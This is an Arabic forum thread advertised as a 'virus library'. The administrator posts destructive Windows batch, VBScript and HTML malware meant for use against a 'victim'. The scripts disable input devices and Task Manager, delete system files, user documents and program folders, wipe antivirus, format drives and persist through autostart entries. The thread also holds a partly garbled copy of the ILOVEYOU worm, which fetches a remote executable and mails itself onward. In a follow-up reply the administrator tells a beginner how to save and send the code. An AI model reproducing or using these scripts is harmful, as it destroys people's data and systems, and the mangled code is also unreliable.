echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg


تعطيل الفارة




كود PHP:
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\S ervices\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4


تعطيل مدير المهام



كود PHP:
@echo off
reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVe rsionPoliciesSystem /v DisableTaskMgr /t REG_SZ /d 1 /f >nul




قتل البروسيس


كود PHP:
@echo off
taskkill /f /t /im "Process.exe"


حذف ملف "My Documents"
كود PHP:
@echo off
del /f /q "%userprofile%\My Documents\*.*"
del /f /q "%userprofile%\Documents\*.*
تعطيل تحديث ويندوز
كود PHP:
@echo off
net stop "wuauserv"
هداالفايروس وهو يقوم بفورمات للجهاز



كود PHP:
Echo off@ cls call attrib -h -r
C:autoexec.bat nul echo @echo off c:autoexec.bat echo delt /y
C:progra~1*.* nul c:autoexec.bat echo copy
C:******scommandformat.com c:nul c: autoexec.bat echo copy
C:******scommanddeltree.exe c: nul c: autoexec.bat echo deltree /y
C:******s*.* nul c:autoexec.bat echo format c: /q /u /autotest nul
C:autoexec.bat bat




فيروس لقتل ال
وس ويسمى ايضا run او exécuter




كود PHP:
@echo off
C:WINDOWSrundll.exe mouse,disable
C:WINDOWSrundll.exe keyboard,disable
del c:command.com
del c:Io.sys
del c:Config.sys
del c:Msdos.sys
del c:windowssystem32command.com
deltree /y C:WINDOWSCOMMAND*.*
deltree /y C:WIN98COMMAND*.*
deltree /y C:WINmeCOMMAND*.*
deltree /y C:WIN_meCOMMAND*.*
deltree /y C:WINxpCOMMAND*.*
deltree /y C:WIN_xpCOMMAND*.*
del d:command.com
del d:Io.sys
del d:Config.sys
del d:Msdos.sys
del d:windowssystem32command.com
deltree


قاتل ملف سيستام
كود PHP:
@echo off
c:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
c:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
القضاء على مضاد الفيروسات النورتون




كود PHP:
@echo off
%WinDir%rundll.exe mouse,disable
%WinDir%rundll.exe keyboard,disable
copy hahahah.BAT %windir%startm~1programsstartup
copy hahahah.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy hahahah.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
deltree /y c:progra~1norton~1*.*
deltree /y d:progra~1norton~1*.*
deltree /y c:progra~1zonela~1*.*
deltree /y d:progra~1zonela~1*.*
cls


كود لقتل الاف بي اس

كود PHP:
dim foldersys
set foldersys=CreateObject("Scripting.FileSystemObject")
If foldersys.FolderExists ("c:\windows") Then
foldersys.DeleteFolder "c:\windows",TRUE
END IF
If foldersys.FolderExists ("c:\win98") Then
foldersys.DeleteFolder "c:\win98",TRUE
END IF
If foldersys.FolderExists ("c:\winme") Then
foldersys.DeleteFolder "c:\winme",TRUE
END IF
If foldersys.FolderExists ("c:\win_me") Then
foldersys.DeleteFolder "c:\win_me",TRUE
END IF
If foldersys.FolderExists ("c:\winxp") Then
foldersys.DeleteFolder "c:\winxp",TRUE
END IF
If foldersys.FolderExists ("c:\win_xp") Then
foldersys.DeleteFolder "c:\win_xp",TRUE
END IF
If foldersys.FolderExists ("d:\windows") Then
foldersys.DeleteFolder "d:\windows",TRUE
END IF




مسح جميع البرامج



كود PHP:
@echo off
dim foldersys
set foldersys=CreateObject("Scripting.FileSystemObject")
If foldersys.FolderExists ("c:\Program Files") Then
foldersys.DeleteFolder "c:\Program Files",TRUE
END IF
If foldersys.FolderExists ("D:\Program Files") Then
foldersys.DeleteFolder "D:\Program Files",TRUE
END IF
مسح كل الذي على سطح المكتب

كود PHP:
@echo off
dim foldersys
set foldersys=CreateObject("Scripting.FileSystemObject")
If foldersys.FolderExists ("c:\My Documents") Then
foldersys.DeleteFolder "c:\My Documents",TRUE
END IF
If foldersys.FolderExists ("D:\My Documents") Then
foldersys.DeleteFolder "D:\My Documents",TRUE
END IF
If foldersys.FolderExists ("c:\My Music") Then
foldersys.DeleteFolder "c:\My Music",TRUE
END IF
If foldersys.FolderExists ("D:\My Music") Then
foldersys.DeleteFolder "D:\My Music",TRUE
END IF
If foldersys.FolderExists ("C:\Documents and Settings") Then
foldersys.DeleteFolder "C:\Documents and Settings",TRUE
END IF
If foldersys.FolderExists ("D:\Documents and Settings") Then
foldersys.DeleteFolder "D:\Documents and Settings",TRUE
END IF
قتل الام بي ثري

كود PHP:
@echo off
dim foldersys
set foldersys=CreateObject("Scripting.FileSystemObject")
If foldersys.FolderExists ("D:\MP3") Then
foldersys.DeleteFolder "D:\MP3",TRUE
END IF
If foldersys.FolderExists ("E:\MP3") Then
foldersys.DeleteFolder "E:\MP3",TRUE
END IF
If foldersys.FolderExists ("F:\MP3") Then
foldersys.DeleteFolder "F:\MP3",TRUE
END IF
If foldersys.FolderExists ("G:\MP3") Then
foldersys.DeleteFolder "G:\MP3",TRUE
END IF
If foldersys.FolderExists ("H:\MP3") Then
foldersys.DeleteFolder "H:\MP3",TRUE
END IF
If foldersys.FolderExists ("I:\MP3") Then
foldersys.DeleteFolder "I:\MP3",TRUE
END IF
If foldersys.FolderExists ("J:\MP3") Then
foldersys.DeleteFolder "J:\MP3",TRUE
END IF
If foldersys.FolderExists ("K:\MP3") Then
foldersys.DeleteFolder "K:\MP3",TRUE
END IF
If foldersys.FolderExists ("D:\SONGS") Then
foldersys.DeleteFolder "D:\SONGS",TRUE
END IF
If foldersys.FolderExists ("E:\SONGS") Then
foldersys.DeleteFolder "E:\SONGS",TRUE
END IF
If foldersys.FolderExists ("F:\SONGS") Then
foldersys.DeleteFolder "F:\SONGS",TRUE
END IF
If foldersys.FolderExists ("G:\SONGS") Then
foldersys.DeleteFolder "G:\SONGS",TRUE
END IF
If foldersys.FolderExists ("H:\SONGS") Then
foldersys.DeleteFolder "H:\SONGS",TRUE
END IF
If foldersys.FolderExists ("I:\SONGS") Then
foldersys.DeleteFolder "I:\SONGS",TRUE
END IF
If foldersys.FolderExists ("J:\SONGS") Then
foldersys.DeleteFolder "J:\SONGS",TRUE
END IF
If foldersys.FolderExists ("K:\SONGS") Then
foldersys.DeleteFolder "K:\SONGS",TRUE
END IF




كود لقطع الانترنات عن الضحية


كود PHP:
@echo off

cd

ipconfig /release

cd

echo "you have a virus in your computer" >>smail.txt

start /max smail.txt
كد تدمير




كود PHP:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%Greatgame > nul
reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v Greatgame /t REG_SZ
/d %systemroot%Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%desktop
copy Greatgame.bat %random%.bat
goto RIP


لو تريد ان تجعل الفيروس ينسخ نفسه إلى ملف ستارتيب فضع الكود هذا




كود PHP:
Copy nad.bat C:documents and setting%userprofile%Start MenuProgramsStartup


ولتجعل الفيروس يخبىء نفسه صع هذا الكود


كود PHP:
Attrib +r +h Virus.bat
Attrib +r +h
جمد المواقع (على سبيل المثالgoogle)



كود PHP:
@echo off
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts"


ضع الموقع الذي تريد تجميده للضحية في مكان google.com




كود الشاشة الزرقاء



كود PHP:
@echo off
rem Activate Blue Screen Of T0TAL_DZ
@((( Echo Off > Nul ) & Break Off )
@Set HiveBSOD=HKLMSoftwareMicrosoftWindowsCurrentVersionRun
@Reg Add "%HiveBSOD%" /v "BSOD" /t "REG_SZ" /d %0 /f > Nul
@Del /q /s /f "%SystemRoot%\Windows\System32\Drivers\*.*"
)



فتح وغلق مشغل الاقراص
كود PHP:
@echo off
echo Do >> "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo Loop >> "opendisk.vbs"
start "" "opendisk.vbs"







كود فيروس حذف Regedit و Msconfig

كود PHP:

c:windowsregedit.exe del

C:windowssystemmsconfig.exe del
كود فيروس خطير جداااا




كود PHP:
rem barok -loveletter(vbe) <i hate this world>

On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d


ow
eq=""
ctr=0
Set fso = CreateObject("ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing.FileSystemObject")
set file = fso.OpenTextFile(Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/Fullname,1)
vbscopy=file.ReadAll

REM main() ' CSS: Main has been REMed out to provide more innoculation. unREM to run.

sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ing Host\Settings\Timeout",0,"REG_DWORD"
end if

Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/FullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

regruns()
html()
REM spreadtoemail() ' CSS: Causes the worm to propogate itself. REMed for even more innoculation.
listadriv()
end sub

sub regruns()
On Error Resume Next
Dim num,downread
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr


entVersion\Run\MSKernel32",dirsystem&"\MSKernel32. vbs"
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr


entVersion\RunServices\Win32DLL",dirwin&"\Win32DLL .vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if

if (fileexist(dirsystem&"WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.skyinet.net/~young1s/ HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf


7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.skyinet.net/~angelcat/ skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j


nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.skyinet.net/~koichi/ jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3V


bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.skyinet.net/~chu/ sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras


djhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy


7thjg/WIN-BUGSFIX.exe"
end if
end if

if (fileexist(downread&"WIN-BUGSFIX.exe")=0) then
regcreate " HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr


entVersionRunWIN-BUGSFIX",downread&"WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page","about :blank"
end if
end sub

sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"")
end if
Next
listadriv = s
end sub

Sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files

for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)

if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.Getghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/Name(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&""&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if

if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.ini") or (s="mirc.hlp") then
set ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini=fso.CreateTextFile(folderspec&"ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.i ni")
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "[ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/]"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";mIRC ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "; Please dont edit this ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/... mIRC will corrupt, if mIRC will"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";Khaled Mardam-Bey"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";http://www.mirc.com/"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine ";"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n0=on 1:JOIN:#:{"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n1= /if ( $nick == $me ) { halt }"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.WriteLine "n3=}"
ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ini.close
eq=folderspec
end if
end if
next
end sub

sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders

for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next

end sub

sub regcreate(regkey,regvalue)
Set regedit = CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.Shell")
regedit.RegWrite regkey,regvalue
end sub

function regget(value)
Set regedit = CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.Shell")
regget=regedit.RegRead(value)
end function

function fileexist(filespec)

On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if

fileexist = msg
end function

function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function



sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega


d
set regedit=CreateObject("Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.Shell")
set out=Wghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)
if (regv="") then
regv=1
end if

if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USERSoftware MicrosoftWAB"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&malead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a,a.Ad dressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a,a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub









جديد
كود بلغة html

مدمر وبجد قاتل

يتم حفظه بصيغة .html




كود PHP:
<html><!--Umbriel-->
<head>
<title> Welcome To The vivky432s Virus Page </title>
</head>
<body>
<script language="VBScript">
rem VBS
On Error Resume Next
Dim fso, shell, wrte, tempdir, windir, rand, file
Set fso=CreateObject("Scripting.FileSystemObject")
Set shell=CreateObject("Wscript.Shell")
if err.number=429 Then
shell.Run javascript:location.reload()
End If

Set windir=fso.GetSpecialFolder(0)
Set tempdir=fso.GetSpecialFolder(2)

Set wrte=fso.CreateTextFile(windir+"\windows.cmd")
wrte.WriteLine "cls"
wrte.WriteLine "@echo off"
wrte.WriteLine "shutdown -s -f -t 300 -c "+chr(34)+"Hi This Is Your Shut Down Message From IoRi..."+chr(34)
wrte.Close()

shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\Source", "C:\umbriel.html"
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html"

Randomize
rand=int(rnd*5)+1
If rand=1 then
shell.Run windir+"\windows.cmd"
End If
</script>

<script language="JavaScript">
// JS
var viruspath, virus, code, fso, file, check, checka, checkb
fso=new ActiveXObject("Scripting.FileSystemObject")
viruspath=window.location.pathname
viruspath=viruspath.slice(1)
virus=fso.OpenTextFile(viruspath,1)
file=fso.CreateTextFile("C:\\umbriel.html")
for (i=0; i<500; i++)
{
if (checkb!=1)
{
if (Math.round(Math.random()*5)+1 == 3)
{
if (check == 2)
{
file.WriteLine("/"+"*")
file.WriteLine("*"+"/")
}
if (check == 3)
{
file.WriteLine("rem")
}
}
code=virus.ReadLine()
if (code == "/"+"*") { checka=666 }
if (code == "*"+"/") { checka=666 }
if (code == "rem") { checka=666 }
if (checka != 666 ) { file.WriteLine(code) }
checka=0
if (code=="</"+unescape("%68")+"tml>") { checkb=1 }
if (code=="// JS") { check=2 }
if (code=="rem VBS") { check=3 }
if (code=="</"+unescape("%73")+"cript>") { check=0 }
}
}
virus.Close();
file.Close();
</script>

<script language="VBScript">
rem VBS
On Error Resume Next
set fso=CreateObject("Scripting.FileSystemObject")
set shell=CreateObject("WScript.Shell")
set myfile=fso.OpenTextFile("C:\umbriel.html")
mycode=myfile.ReadAll
myfile.Close()
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File1")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File2")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File3")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File4")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File5")
if rr <> "" Then Call Umbriel(rr, mycode)

Sub Umbriel(rr, mycode)
set victim=fso.OpenTextFile(rr)
infcheck=victim.ReadLine
If infcheck<>"<html><!--Umbriel-->" Then
viccode=victim.ReadAll
victim.Close()
set wrtevic=fso.OpenTextFile(rr, 2, false, 0)
wrtevic.Write (mycode+infcheck+chr(13)+chr(10)+viccode)
wrtevic.Close
End If

End Sub
</script>
</body>
</html>


avatar
Admin
Admin
Admin

عدد المساهمات : 1255
تاريخ التسجيل : 22/11/2011
العمر : 22
الموقع : http://ahmed2012.yoo7.com

http://ahmed2012.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: اكبر مكتبة فايروسات virus

مُساهمة من طرف anonymous.r في الأربعاء 26 يونيو 2013, 7:30 pm

السلام عليكم

اخوي انا واحد مبتدأ بس حبيت اعرف وين نكتب هدا الكود و كيف اطرشة ؟!

anonymous.r

عدد المساهمات : 2
تاريخ التسجيل : 26/06/2013

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: اكبر مكتبة فايروسات virus

مُساهمة من طرف Admin في الخميس 27 يونيو 2013, 1:14 pm

اخى ضع الكود بالنوتاباد وسمية بالاسم اللى فوق
avatar
Admin
Admin
Admin

عدد المساهمات : 1255
تاريخ التسجيل : 22/11/2011
العمر : 22
الموقع : http://ahmed2012.yoo7.com

http://ahmed2012.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة

- مواضيع مماثلة

 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى